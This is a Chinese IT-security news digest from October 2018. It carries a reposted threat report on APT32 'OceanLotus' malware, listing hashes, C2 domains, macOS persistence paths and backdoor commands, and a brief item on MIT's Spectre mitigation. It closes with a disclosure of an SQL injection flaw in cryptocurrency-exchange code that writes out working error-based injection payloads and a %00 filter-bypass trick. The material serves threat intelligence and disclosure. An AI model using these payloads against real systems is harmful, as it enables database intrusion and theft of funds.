Mordy期刊181020：十月IT界发生了什么？

2018-10-20 本文已影响25人 Morby

APT32“海莲花”近期多平台攻击活动：熟悉的手段，全新的IOC

注：转载于freebuf

“海莲花”，又名APT32和OceanLotus，是越南背景的黑客组织。该组织至少自2012年开始活跃，长期针对中国能源相关行业、海事机构、海域建设部门、科研院所和航运企业等进行网络攻击。除中国外，“海莲花”的目标还包含全球的政府、军事机构和大型企业，以及本国的媒体、人权和公民社会等相关的组织和个人。

2017年下半年至今，微步在线发布了《“海莲花”团伙的最新动向分析》、《“海莲花”团伙专用后门Denis最新变种分析》、《微步在线发现“海莲花”团伙最新macOS后门》和《“海莲花”团伙本月利用Office漏洞发起高频攻击》等多篇报告，披露了APT32的相关攻击活动。近期，微步在线黑客画像系统监控到该组织多平台的攻击活动，经分析发现：

APT32的攻击活动仍在持续，近期中国、韩国、美国和柬埔寨等国金融、政府和体育等行业相关目标遭到定向攻击。

攻击平台包含Windows和macOS，攻击手法相比之前变化不大，除都使用了伪装Word文档的可执行程序之外，针对Windows平台的还利用了CVE-2017-11882漏洞。

针对Windows平台的木马部分利用了白加黑技术，部分利用了Regsvr32.exe加载执行OCX可执行文件。此外，相比之前多利用Symantec公司签名的程序进行白加黑利用来投递Denis木马，APT32近期增加了对Intel和Adobe公司签名程序的白加黑利用。

针对macOS平台的木马相较之前其Dropper和Payload加了壳和虚拟机检测。

微步在线通过对相关样本、IP和域名的溯源分析，共提取22条相关IOC，可用于威胁情报检测。微步在线的威胁情报平台（TIP）、威胁情报订阅、API等均已支持此次攻击事件和团伙的检测。

详情

微步在线长期跟踪全球150多个黑客组织。近期，微步在线监测到APT32针对中国、韩国、美国和柬埔寨等国金融、政府和体育等行业相关目标的多平台攻击活动。该组织近期手法与之前相比变化不大，其中针对Windows平台的攻击主要利用包含CVE-2017-11882漏洞的doc文档结合白加黑利用和图标伪装为Word的RAR自解压文件来投递其特种木马Denis，针对macOS平台的亦同样是将macOS应用程序伪装为Word文档进行木马投递。

与此前一样，诱饵文档内容都是模糊图片，例如Scanned Investment Report-July 2018.ⅾocx：

样本分析

微步在线在8月份监控到多起APT32的攻击活动，涉及Windows和macOS平台。相关分析如下：

Windows样本

漏洞样本

在Office漏洞利用方面，APT32近期主要利用CVE-2017-11882漏洞投递Denis木马。《“海莲花”团伙本月利用Office漏洞发起高频攻击》对CVE-2017-11882漏洞利用做过详细分析，详情可查阅相关报告。近期相关的部分漏洞样本：

SHA256文件名诱饵内容C2攻击手法

e7f997778ca54b87eb4109d6d4bd5a905e8261ad410a088daec7f3f695bb8189July , 2018.doc模糊图片ourkekwiciver.comdieordaunt.comstraliaenollma.xyzCVE-2017-11882加Intel白利用

0abe0a3b1fd81272417471e7e5cc489b234a9f84909b019d5f63af702b4058c5FW Report on demonstration of former CNRP in Republic of Korea.doc模糊图片andreagahuvrauvin.combyronorenstein.comstienollmache.xyzCVE-2017-11882加Adobe白利用

以e7f997778ca54b87eb4109d6d4bd5a905e8261ad410a088daec7f3f695bb8189为例，该样本在微步在线云沙箱的分析结果如下图所示，从“云沙箱-威胁情报IOC”可发现此样本相关C2已被识别为APT32所有。

多引擎检测：

执行流程：

威胁情报IOC

RAR自解压样本

APT32经常使用伪装成Word文档的可执行程序作为投递木马的载体，通常还会结合RLO手法迷惑受害者。近期伪装成Word文档的部分RAR自解压文件：

SHA256文件名诱饵内容C2攻击手法

58e294513641374ff0b42b7c652d3b4a471e8bde8664a79311e4244be0546df4Sum for July 2018.exe模糊图片andreagbridge.comillagedrivestralia.xyzbyronorenstein.comRAR自解压，利用regsvr32.exe运行OCX

78a1f6d9b91334e5435a45b4362f508ae27d7ad784b96621d825c2e966d04064feedback, Rally in USA from July 28-29, 2018.exe模糊图片stienollmache.xyzchristienollmache.xyzlauradesnoyers.comRAR自解压，利用regsvr32.exe运行OCX

以样本78a1f6d9b91334e5435a45b4362f508ae27d7ad784b96621d825c2e966d04064为例。使用WinRAR查看该文件，可发现该自解压文件运行后会通过regsvr32.exe加载执行释放的OCX可执行文件，然后打开诱饵文档迷惑受害者，如下图：

该样本在微步在线云沙箱的分析结果如下图所示，从“云沙箱-威胁情报IOC”亦可发现此样本相关C2已被识别为APT32所有。

执行流程：

威胁情报IOC

macOS样本

微步在线近期还捕获了多个APT32针对macOS平台的特种木马，下文以“Scanned Investment Report-July 2018.ⅾ[footnoteRef:1]ocx”为例进行分析。

该样本的基本信息如下：

文件类型Zip文件，macOS app

文件大小454,967 字节

文件名Scanned Investment Report-July 2018.ⅾocx

MD5a3d09d969df1742a7cc9511f07e9b44b

SHA101ad8b20337da00d1d458ba93f98dc996a97a71f

SHA25668f7ca2f1fa9f0b5151bec686144eafc13a1e2266dcfc95fafc3104f0a96b802

该样本为后缀伪装成为.docx的macOS应用程序，一旦双击运行则会执行\Contents\MacOS\下的Scanned Investment Report-July 2018可执行文件，导致系统被感染。该可执行文件是一个Dropper，相比此前《微步在线发现“海莲花”团伙最新macOS后门》中分析的样本，该Dropper和其释放的Payload都加了一个简单的壳，Payload相比之前也增加了虚拟机检测。

样本Scanned Investment Report-July 2018运行后判断启动权限，根据权限释放文件到不同目录，然后设置隐藏属性和修改文件创建时间。其中 mouseevents 和mediaagentd属同一文件，为恶意Payload程序，plist文件的功能是实现对应Payload的开机自启。

权限释放文件

root/Library/Mouse/Primary/mouseevents/Library/LaunchDaemons/com.apple.mouses.event.plist

非root/Users/boy/Library/Video/Download/Updater/mediaagentd/Users/boy/Library/LaunchAgents/com.apple.media.agentd.plist

修改创建时间相关命令如下：

com.apple.mouses.event.plist被设置为隐藏属性，其创建时间被修改为2017-11-22 00:33:43，文件内容如下：

样本释放的mouseevents属后门程序，其核心功能是接受C2控制执行各种操作，具体包含上传下载和删除文件、执行shell命令等等。相关分析如下：

1、mouseevents首先会通过检测系统信息来做反虚拟机检测。通过内置关键字vmware、virtualbox、parallels来检测程序是否运行在虚拟环境中。使用的shell命令如下：

2、如检测到运行在虚拟环境中，则通过shell命令删除其父程序所在的目录。但有趣的是，即使检测到自身运行在虚拟机环境中也不会退出，只会不断的循环检测运行环境。使用shell命令如下：

3、如检测到不在虚拟环境中，则会随机休眠一段时间。

4、然后通过shell命令获取系统版本、用户名、计算机名和系统架构体系等信息。相关代码和指令如下：

Shell命令功能

ioreg -rd1 -c IOPlatformExpertDevice | awk ‘/IOPlatformSerialNumber/ { split($0, line, \”\\\”\”); printf(\”%s\”, line[4]); }’ 2>&1″获取IOPlatformUUID

system_profiler SPHardwareDataType 2>/dev/null | awk ‘/Memory/ {split($0,line, \”:\”);获取系统内存大小

sw_vers –productVersion获取系统版本

uname –m获取处理器架构

scutil –get ComputerName获取用户名

5、在获取系统信息之后，程序会解密出C2并拼接“/store/ads/modal.css”作为上线的URL，拼接的URL具有一定的欺骗性。上线发送的内容包含安装时间、安装路径、PID、是否root权限、Arch、计算机名称、用户名和系统版本等信息。

6、该后门内置3个C2域名，执行时按顺序请求连接，若连接失败超过5次，则会解密下一个域名并尝试连接。如第一个域名就上线成功，则不会解密之后的域名。该样本内置的C2域名为web.dalalepredaa.com、p12.alerentice.com和rio.imbandaad.com。C2的解密算法为AES256，解密key如下：

7、程序通过设置一个全局变量的值来判断选取哪个域名作为上线域名，通过curl模块发送网络连接，通过返回值来判断是否获取下一个C2。

8、一旦上线成功，程序会在随机等待一段时间之后向{C2 domain}/appleauth/static/cssj/N252394295/widget/auth/app.css循环请求控制指令。

9、通过对C2返回的0x2F开始的0×10个字节进行rol 2并异或0×13得到控制指令。

10、该后门包含7个控制指令，相关指令和对应功能如下表：

指令功能

0xE8结束自身进程

0xA2将执行控制指令shell命令写入文件，执行，并上传结果

0xAC执行控制指令shell命令，并上传结果

0x3C下载文件

0×23同0x3C

0×72上传文件

0×48删除文件

0×32设置请求超时的时间

0×33获取文件信息

其他不执行有效操作

关联分析

微步在线威胁情报云显示，APT32的攻击仍在持续，近期中国、韩国、美国和柬埔寨相关目标遭到定向攻击。以微步在线狩猎系统捕获的诱饵文档July , 2018.doc为例，该文件创建时间为2018/08/06，野外发现时间为2018/08/14，结合文件名判断，该样本应是在8月中上旬被攻击者使用。但其最终释放的后门的C2早已被微步在线识别，这侧面体现了威胁情报相较于传统安全产品的优势，可以在攻击者发起攻击之前就识别其攻击资产。如下图：

由于相关诱饵文档内容均为模糊图片，难以通过文档内容进行受害者分析，此处主要以诱饵文件名结合首次发现地等信息对受害者进行分析。

诱饵“FW Report on demonstration of former CNRP in Republic of Korea.doc”可译为“关于在韩国的前CNRP示威活动的第一手报告.doc”。CNRP即柬埔寨救国党，该党被柬埔寨最高法院在2017年11月16裁决解散。该党领袖莫淑华在2018年6月24领导在韩务工人员在韩国首尔举行示威活动，要求日本不要承认柬埔寨大选（7月29日举行）结果，以及释放该党主席根索卡。由此可推测，此次攻击的受害者极有可能为柬埔寨政府或关注柬埔寨政事的相关目标。有趣的是，微步在线2017年8月份发布的报告《“海莲花”团伙的最新动向分析》曾披露相关针对柬埔寨选举的攻击活动，结合此前以2018柬埔寨展望会议为主题的攻击，说明APT32持续在针对柬埔寨进行定向攻击。

针对macOS平台的诱饵名为“Scanned Investment Report-July 2018”，可译为“扫描的2018年7月投资报告”，疑似针对金融相关目标。

诱饵“feedback, Rally in USA from July 28-29, 2018”，可译为“从2018年7月28日至29日美国拉力赛的反馈”，疑似针对体育或汽车相关行业目标。

附录

获取本次报告IOC请访问链接：https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=785。

Intel迟迟未修复熔断/幽灵漏洞麻省理工给出新方案

Meltdown熔断、Spectre幽灵两大安全漏洞的爆出绝对是今年处理器领域最大的噩梦，影响之深远、波及之广泛、余威之延续，在整个产业历史上都极为罕见。

时至今日，Intel仅仅在刚发布的第九代酷睿处理器(Coffee Lake-S Refresh)上从硬件底层部分修复了熔断漏洞，其他更多漏洞仍需通过刷新BIOS、打补丁的方式解决，而且多多少少会影响性能。

接下来将在年底发布的新一代服务器平台Cascade Lake也会是类似的部分硬件修复，而新发的九代酷睿X系列发烧处理器则完全未硬件修复。

Intel修复漏洞的速度如此之慢，主要还是这一波漏洞的变种和影响的产品实在太多，Intel也不得不重新设计部分硬件特性才能完全免疫。

不过，麻省理工学院(MIT)的研究者们近日发表了一篇论文，给Intel指出了一条新的“明路”。

不同于Intel自己用的“缓存分配技术”(Cache Allocation Technology/CAT)，麻省理工的研究者们提出了一种名为“动态分配路径保护”(Dynamically Allocated Way Guard/DAWG)的新技术，利用保护区来分割、隔离内存缓存，让攻击者无从下手，不能再通过缓存获取敏感、隐私数据。

研究者还称，这种方法只需对操作系统底层稍作修改即可，无需大动干戈，同时对性能造成的影响也完全在可接受范围内。

Helm实验室披露：超过200家交易所使用了这套问题代码

近日，HELM区块链安全实验室在GitHub上发现了一套众多交易所可能正在使用的通用源码，经过分析发现其中存在大量的通用0day漏洞。据我们初步统计，使用此代码的交易所超过200家，目前仍存在该漏洞的交易所超过40家。

在与开发商联系过后，得知其发布的演示站是升级过的第二个版本，而新版本虽然已经对该0day进行不完全修复，仍然可以被绕过。为了保证相关交易所的资金安全，HELM区块链安全实验室对此漏洞以及黑客的攻击手法进行分析披露，并提供修复方式，希望各大交易所尽快修复漏洞以防患于未然。

这里我们选择其中一枚高危漏洞（SQL注入类型）进行披露，该漏洞可简单绕过防护，可通过报错注入获取数据库信息，从而获得后台管理权限；黑客通过操纵用户资金交易，可导致交易所资金遭受严重威胁。此注入点存在于行情页面中的请求连接（下图红框），请各个使用此页面类似功能的交易所自查。

通过payload：／Chart／＊＊＊＊＊？market＝＇ and updatexml（1，concat（＇～＇，user（），＇～＇），1）－－ a获取到数据库连接。

用户名：li＊＊＊＊

连接地址：localhost

在执行获取表名payload：

／Chart／＊＊＊＊？market＝＇and updatexml（1，concat（＇～＇，（select count（＊） from information＿schema．tables where table＿schema＝database（）），＇～＇），1）－－ a

被拦截。

只需加％00绕过即可，payload：

／Chart／＊＊＊？market＝＇ and updatexml（1，concat（＇～＇，（se％00lect cou％00nt（＊） f％00rom informat％00ion＿schema．tables wh％00ere table＿schema＝database（）），＇～＇），1）－－ a

用burpsuite获取到表名